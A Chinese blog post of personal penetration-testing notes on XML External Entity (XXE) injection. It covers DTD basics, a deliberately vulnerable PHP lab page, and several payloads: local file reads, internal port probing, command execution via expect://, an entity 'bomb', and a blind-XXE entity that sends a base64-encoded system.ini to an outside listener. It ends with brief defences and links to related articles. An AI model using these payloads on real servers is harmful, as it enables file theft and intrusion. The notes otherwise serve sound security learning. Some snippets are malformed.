个人笔记-渗透测试-XXE漏洞

已于 2024-05-27 09:10:29 修改
阅读量779 收藏 11
点赞数 12
分类专栏: 网安 文章标签: 笔记 网络安全 xml
于 2024-05-26 16:41:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48162696/article/details/139214050
版权

一,XML基础

eXtensible Markup Language (可扩展标记语言)

用途:

  • 作配置文件
    <?xml version="1.0" encoding="UTF-8"?>	<!-- XML声明 -->
<a>	<!-- 根元素 -->
	<display-name>xxl-job-executor-sample-spring</displayname>
	<b id=“name”></b>	<!-- 子元素 -->
</a>
  • 交换数据——用于特殊通信

格式要求:

  • XML文档必须有唯一根元素
  • XML文档必须有关闭标签
  • XML标签对大小写敏感
  • XML元素必须被正确的嵌套
  • XML属性必须加引号

XML格式校验——DTD

  • DTD(Document Type Definition)文档类型定义

  • DTD可以是独立文件,也可以在xml文档中声明

  • DTD内容——元素

    <!DOCTYPE TranInfo[
<!ELEMENT TranInfo(CdtrInf,DbtrInf,Amt)>
<!ELEMENT CdtrInf(Id,Nm)>
<!ELEMENT DbtrInf(Id,Nm)>
]>

    对应XML:

    <?xml version="1.0" encoding="UTF-8"?>
<TranInfo>
	<CdtrInf>
		<Id>01</Id><Nm>zhangsan</Nm>
	</CdtrInf>
	<DbtrInf>
		<Id>02</Id><Nm>lisi</Nm>
	</DbtrInf>
	
	<Amt>1000</Amt>
</TranInfo>

  • DTD内容——内部实体

    <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name[
<!ELEMENT name ANY>
<!ENTITY cs "beijing">
]>
<!-- 实体的使用 -->
<people>
	<name>test</name>
	<area>&cs;</area>
</people>

    用浏览器打开得到对应XML:

    <people>
	<name>test</name>
	<area>beijing</area>
</people>

  • DTD内容——外部实体

    <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name[
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "file://D:/test/test.dtd">
]>
<!-- 实体的使用 -->
<people>
	<name>test</name>
	<area>&xxe;</area>
</people>

    外部实体引用协议:

    • file:///etc//passwd
    • php://filter/read=convert.base64-encode/resource=index.php
    • http://

    不同语言支持不同的协议,如果要支持某协议,需要安装扩展

  • 完整的XML内容

    <!-- xml声明部分-->
<?xml version="1.0"?>
<!-- 文档类型定义DTD-->
<!DOCTYPE note[
<!ENTITY entity-name SYSTEM "URI/URL">
]!>
<!-- 文档元素-->
<note>
	<><>
	<><>
	<><>
</note>

二,什么是XXE

XML External Entity injection (XML外部实体注入)

XXE定义:如果web应用的脚本代码没有限制XML引入外部实体,从而导致用户可以插入一个外部实体,并且其中的内容会被服务器端执行,插入的代码可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。

  • 通过file协议读取解析指定文件,也可以读取解析其他敏感文件
    <?xml version="1.0"?>
<!DOCTYPE foo[
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///c:/test.dtd">
]!>

<creds>
	<user>&xxe;</user>
	<pass>password</pass>
</creds>

复现xxe漏洞:

  1. 搭建一个显示xxe的简单网站:

    <head><meta charset=utf-8>
	<title>xxe测试</title>
</head>
<body>
	<form action='' method='post'>xml数据:<br>
		<textarea type="text" name="data"></textarea>
		<br><input type='submit' value='提交' name='sub'>
	</form>
</body>

<?php
  date_default_timezone_set("PRC");
  if(!empty($_POST['sub'])){ 
  	$data= $_POST['data'];
    $xml = simplexml_load_string($data);
    print($xml); 
  }
?>

  2. 使用payload

    <?xml version="1.0" encoding="utf-8"?><!DOCTYPE note[<!ENTITY xxe SYSTEM "file:///D://files/tv.txt">]><login>&xxe;</login>

  3. 复现失败可能是php版本不对,simplexml_load_string函数失效,改为php5.4.45nts版本即可

三,XXE利用方式

调用文件

	<?xml version="1.0" encoding="utf-8"?><!DOCTYPE note[<!ENTITY xxe SYSTEM "file:///D://files/tv.txt">]><login>&xxe;</login>

测试端口

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE note[<!ENTITY xxe SYSTEM "http://127.0.0.1:3306">]><login>&xxe;</login>

执行程序

<!-- 需要安装扩展-->
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE note[<!ENTITY xxe SYSTEM "expect://ipconfig">]><login>&xxe;</login>

xxe炸弹

<!ENTITY xxe "file:///dev/random">]><login>&xxe;</login>

如何检测xxe漏洞

  • 在xml中加入能调用外部实体的代码,看看回显

    POST /xxe-lab/php_xxe/doLogin.php HTTP/1.1
    Host: 192.168.133.1
    Content-Length: 132
    Accept: application/xml, text/xml, /; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Content-Type: application/xml;charset=UTF-8
    Origin: http://192.168.133.1
    Referer: http://192.168.133.1/xxe-lab/php_xxe/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    <!DOCTYPE a[<!ENTITY xxe SYSTEM "file:///d:test.txt">]>
    <user><username>123 &xxe;</username><password>3123</password></user>

  • 如果没有回显,则进行xxe的盲打-http接口参数,写入文件:

    • 使用dnslog监听
      <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://wwwtest.aeagwg.dnslog.cn">%remote;]>
    • 或者自己写一个接口
      <?xml version="1.0">
<!DOCTYPE ANY[
<!ENTITY % remote SYSTEM "http://域名/user.dtd">
]>


      <!ENTITY % file SYSTEM
"php://filter/read=convert.base64-encode/resource=file:///c:/system.ini">

<!ENTITY % int "<!ENTITY &#37; send SYSTEM'http://192.168.1.1:8080?p=%file;'>">

四,XXE防御

  • 禁用实体解析代码,防止解析外部实体
    libxml_disable_entity_loader(true);
  • 过滤用户提交的xml数据

    "
    <
    >
    ]>
    <!–
    <! [CDATA[/]]>
  • 使用WAF过滤

五,playload–即拿即用

  1. <?xml version="1.0"?><!DOCTYPE test [<!ENTITY hacker "haha">]><name>&hacker;</name>

  2. <?xml version="1.0"?><!DOCTYPE name [<!ENTITY xxe SYSTEM "file:///D:/files/tv.txt">]><name>&xxe;</name>

XXE渗透与攻防(一)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-28 562
现在许多不同的客户端技术都可以使用XMl向业务应用程序发送消息,为了使应用程序使用自定义的XML消息,应用程序必须先去解析XML文档,并且检查XML格式是否正确。当解析器允许XML外部实体解析时,就会造成XXE漏洞,导致服务器被攻击。
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
XXE漏洞学习笔记
qq_40096118的博客
05-10 813
XML指可扩展标记语言(EXtensible Markup Language)XML是一种标记语言,很类似 HTMLXML被设计为传输和存储数据,其焦点是数据的内容XML被设计用来结构化、存储以及传输信息XML允许创作者定义自己的标签和自己的文档结构DTD全称为,Document Type Definition,中文翻译为文档类型定义,是一套为了进行程序间的数据交换而建立的关于标记符的语法规则。文档类型定义(DTD)可定义合法的XML文档构建模块。
黑夜的猎杀-盲打XXE
weixin_30699955的博客
01-06 270
在进入正文前,我想告诉大家,文章没有涉及任何XXE攻击的任何新技巧,这只是我遇到的一个案例,我只想分享给大家。 简短的摘要是非常重要的: 在对后台一无所知的情况下发现了一个XXE漏洞,该漏洞没有返回任何数据或者文件,这就是盲打XXE 使用盲打XXE进行基于报错的端口扫描 成功的外部交互正常进行 充分利用了盲打XXE识别了后端系统的文件 身为渗透测试人员,我每天都的学习都很充...
burpsuite靶场——XXE
qq_61768489的博客
12-26 1382
XML全称是可扩展标记语言,是用来存储和传输数据的一种数据格式,结构上和HTML类似,但是XML使用的是自定义的标签名,XML在Web早期中比较流行,现在开始流行JSON格式的数据了。XML实体是一种表示数据项的方式,比如用实体< and >表示符号,XML用实体来表示XML标签。DTD全称是document type definition,其可以定义XML文档的结构、它可以包含的数据类型和其他项目。DTD在XML文档开头以可选DOCTYPE节点中声明。
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6613
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
【技巧总结】理解XXE从基础到盲打
weixin_30871293的博客
12-10 395
原文:http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html 这篇文章中将讨论以下问题。 XXE是什么? 如何确认XXE? 如何利用基本XXE? 如何盲打XXE? 以及盲打XXE有效载荷的备选方案。 首先要了解一些基本的关键词。 实体:实体引用充当缩写或可以在外部位置找到的数据。...
渗透测试XXE漏洞原理
ssrf
12-06 732
目录一、XXE是什么?二、具体实验1、有回显读本地敏感文件2、无回显读本地敏感文件 一、XXE是什么? 普通的 XML 注入: 这类似于xss攻击,向源码中插入我们构造好的标签完成攻击。 XXE(XML External Entity Injection) 全称为 XML 外部实体注入 二、具体实验 1、有回显读本地敏感文件 实验环境phpStudy 2018 PHP 5.4.45 PHP <?php libxml_disable_entity_loader (false); $xm
渗透之路基础 -- XXE注入漏洞
09-17 441
XXE漏洞 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 类似于...
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
CVE-2018-11788:Apache Karaf XXE漏洞(CVE-2018-11788)
03-18
在最近对Apache Karaf的研究中,我发现其XML解析器中存在一些XXEXML外部实体注入)漏洞。 导致解析器不正确地解析XML文档。受影响的版本Apache Karaf <= 4.2.1 Apache Karaf <= 4.1.6分析根据,Apache ...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞的测试原理可以分为以下几个步骤: 首先,攻击者需要构造恶意的 XML 文档,该文档中包含外部实体的引用。然后,攻击者将该文档发送给服务器,并 trick 服务器将任意文件读取出来。最后,攻击者可以通过查看...
WebGoat8-xxe注入漏洞分析
09-15
在 Web 应用程序安全测试中,XXEXML External Entity)注入漏洞是一种常见的漏洞,攻击者可以通过该漏洞读取服务器上的敏感信息甚至控制服务器。下面是对 WebGoat8 中的 XXE 注入漏洞的分析。 XXE 注入漏洞的工作...
网络安全课第五节 XXE 漏洞的检测与防御
fegus的博客
07-11 1598
上一讲我们介绍了 SSRF 漏洞,一种专门针对服务端的请求伪造攻击,常被用于攻击内网。在里面我介绍了 Burp Collaborator 用于专门测试无回显漏洞的功能,在本讲的 XXE 漏洞测试中,我们依然可以使用,不知道你是否还记得怎么使用?下面,我们就开始今天的课程,一场关于 XML 外部实体注入(XXE漏洞的攻防之路。XXEXML External Entity,XML 外部实体注入)正是当允许引用外部实体时,通过构造恶意内容,导致读取任意文件、执行系统命令、内网探测与攻击等危害的一类漏洞。PHP
实战项目 2 Linux-XXE 靶场渗透测试案例详解
m0_50572593的博客
06-21 2196
XXE(xml external entity injection) 既"xml 外部实体注入漏洞"。概括一下就是"攻击者通过向服务器注入指定的 xml 实体内容,从而让服务器按照指定的配置进行执行,导致问题“也就是说服务端接收和解析了来自用户端的 xml 数据,而又没有做严格的安全控制,从而导致 xml 外部实体注入。造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起 dos 攻击等危害。
34-XXEXML外部实体注入)
XLbb的博客
05-19 1041
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。3、文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。4、基本的PAYLOAD结构:5、使用DTD实体的攻击方式 :DTD 引用方式(简要了解):1. DTD 内部声明DOCTYPE 根元素 [元素声明]>2. DTD 外部引用。
XXE漏洞详解(全网最详细)
qq_61553520的博客
05-09 6035
XXE:全称为XML Enternal Entity Injection,中文名称:XML外部实体注入。
XXE漏洞中DOCTYPE、ENTITY傻傻分不清-WEB安全基础入门—XML外部实体注入(XXE)_xxe 用eneity不行
2401_84185182的博客
04-28 1158
也可以采用file://协议,读取文件。注意路径前是三个///在此提前点出,XML外部实体是XML外部实体攻击的主要利用点。
批量归一化 BN(Batch Normalization) (减少重复学习 - 加速损失收敛) + 代码实现 ——笔记2.15《动手学深度学习》
最新发布
科研汪小陈的博客
11-08 776
批量归一化固定小批量中的均值和方差,然后学习出适合的偏移和缩放; 可以加速收敛速度(比如以前学习率是0.01,现在用了批量归一化后,可以调到0.1) 不会出现之前:学习率太大的话,上面 (靠近损失的梯度) 会炸掉; 不会出现之前:学习率太小的话,下面 (靠近数据的模型参数) 会学不动; 每一个层的输出都通过均值方差放在一起了,上下层的分布都差不多是正态分布; 但一般不改变模型精度
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值